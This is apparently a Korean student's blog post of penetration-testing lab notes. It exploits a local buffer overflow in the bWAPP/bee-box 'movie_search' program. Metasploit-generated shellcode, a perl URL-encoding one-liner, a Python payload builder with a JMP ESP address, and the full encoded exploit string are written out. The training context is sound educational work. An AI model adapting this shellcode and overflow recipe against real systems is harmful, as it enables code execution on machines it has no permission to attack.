Notice

Recent Posts

Recent Comments

Link

« 2025/05 »
일	월	화	수	목	금	토
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30	31

Tags more

Archives

Today

Total

관리 메뉴

IT 공부용

12. A9 – Using Known Vulnerable Components (알려진 취약점이 있는 컴포넌트 사용) 본문

▶ 모의 해킹

12. A9 – Using Known Vulnerable Components (알려진 취약점이 있는 컴포넌트 사용)

호롤롤로루 2022. 10. 6. 11:27

● Buffer Overflow (Local)

## bwapp

HINT: \x90*354 + \x8f\x92\x04\x08 + [payload]

\x8f\x92\x04\x08: JMP ESP로 뒤에 있는 payload를 실행함

## bebox

# gedit bof_1.php

echo shell_exec("./apps/movie_search " . $title);

=> 내부적으로 사용하는 프로그램 확인

# ls -l ./apps/movie_search

=> 이 프로그램에서 데이터가 354개 이상일 때 문제 발생

## kali

# msfdb init

# msfconsole

msf > use linux/x86/exec

msf payload(exec) > show options

msf payload(exec) > set cmd /bin/ps

msf5 payload(linux/x86/exec) > generate -b '\x00' -e x86/opt_sub -f raw -o /tmp/payload.txt

[*] Writing 205 bytes to /tmp/payload.txt...

msf payload(exec) > exit

=> 메타스플로잇이 기계어를 만들어줌

=> '-b \x00': Bad Character는 \x00으로 이를 넣지 말아달라는 옵션

# cat /tmp/payload.txt => 출력 내용 확인

# { echo -n \'; cat /tmp/payload.txt; echo -n \'; } | perl -pe's/(.)/sprintf("%%%02x", ord($1))/seg'

%27%54%58%2d%05%fd%fd%fd%2d%01%01%01%01%2d%01%01%01%01%50%5c%25%01%01%01%01%25%02%02%02%02%2d%75%1c%30%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%14%df%74%2b%2d%01%01%01%01%2d%01%01%01%01%50%2d%08%90%25%e1%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%6c%fe%0b%2d%01%01%01%01%2d%01%01%01%01%50%2d%ac%15%24%60%2d%01%01%01%01%2d%01%01%01%01%50%2d%e7%77%7d%1a%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%04%58%7f%2d%01%01%01%01%2d%01%01%01%01%50%2d%96%36%ba%f7%2d%01%01%01%01%2d%01%01%01%01%50%2d%39%ca%e7%7e%2d%01%01%01%01%2d%01%01%01%01%50%2d%92%0e%21%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%07%e6%58%0e%2d%01%01%01%01%2d%01%01%01%01%50%27

# /home/kali/gedit test.py

dummy = '%41' * 354

jmpesp = '%8f%92%04%08'

shellcode = '%27%54%58%2d%05%fd%fd%fd%2d%01%01%01%01%2d%01%01%01%01%50%5c%25%01%01%01%01%25%02%02%02%02%2d%75%1c%30%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%14%df%74%2b%2d%01%01%01%01%2d%01%01%01%01%50%2d%08%90%25%e1%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%6c%fe%0b%2d%01%01%01%01%2d%01%01%01%01%50%2d%ac%15%24%60%2d%01%01%01%01%2d%01%01%01%01%50%2d%e7%77%7d%1a%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%04%58%7f%2d%01%01%01%01%2d%01%01%01%01%50%2d%96%36%ba%f7%2d%01%01%01%01%2d%01%01%01%01%50%2d%39%ca%e7%7e%2d%01%01%01%01%2d%01%01%01%01%50%2d%92%0e%21%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%07%e6%58%0e%2d%01%01%01%01%2d%01%01%01%01%50%27'

payload = shellcode[:3] + dummy + jmpesp + shellcode[3:]

print(payload)

=> %41 * 354: a를 354개 넣어라, 문제에서 354라 힌트를 줌

=> shellcode[:3]: %27

=> dummy: a 354개

=> jmpesp: return

=> shellcode[3:] : %54 ~ %27

=> payload = shellcode[:3] + dummy + jmpesp + shellcode[3:]에서 shellcode:3을 앞에 두는 이유는 %27이 "이기 때문

# python test.py

%27%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%8f%92%04%08%54%58%2d%05%fd%fd%fd%2d%01%01%01%01%2d%01%01%01%01%50%5c%25%01%01%01%01%25%02%02%02%02%2d%75%1c%30%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%14%df%74%2b%2d%01%01%01%01%2d%01%01%01%01%50%2d%08%90%25%e1%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%6c%fe%0b%2d%01%01%01%01%2d%01%01%01%01%50%2d%ac%15%24%60%2d%01%01%01%01%2d%01%01%01%01%50%2d%e7%77%7d%1a%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%04%58%7f%2d%01%01%01%01%2d%01%01%01%01%50%2d%96%36%ba%f7%2d%01%01%01%01%2d%01%01%01%01%50%2d%39%ca%e7%7e%2d%01%01%01%01%2d%01%01%01%01%50%2d%92%0e%21%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%07%e6%58%0e%2d%01%01%01%01%2d%01%01%01%01%50%27

=> msf payload(exec) > set cmd /bin/ps 결국 이 부분 실행하기 위한 것 // pid 내용 출력 확인

'▶ 모의 해킹' 카테고리의 다른 글

13. Unvalidated Redirects & Forwards (0)	2022.10.06
11. A8_CSRF(Cross site request forgery) (0)	2022.10.05
8. A5. Security Misconfiguration(보안 설정 오류) (0)	2022.10.04
7. A4 (취약한 직접 객체 참조) (0)	2022.09.30
6. A3_ XSS (0)	2022.09.29

'▶ 모의 해킹' Related Articles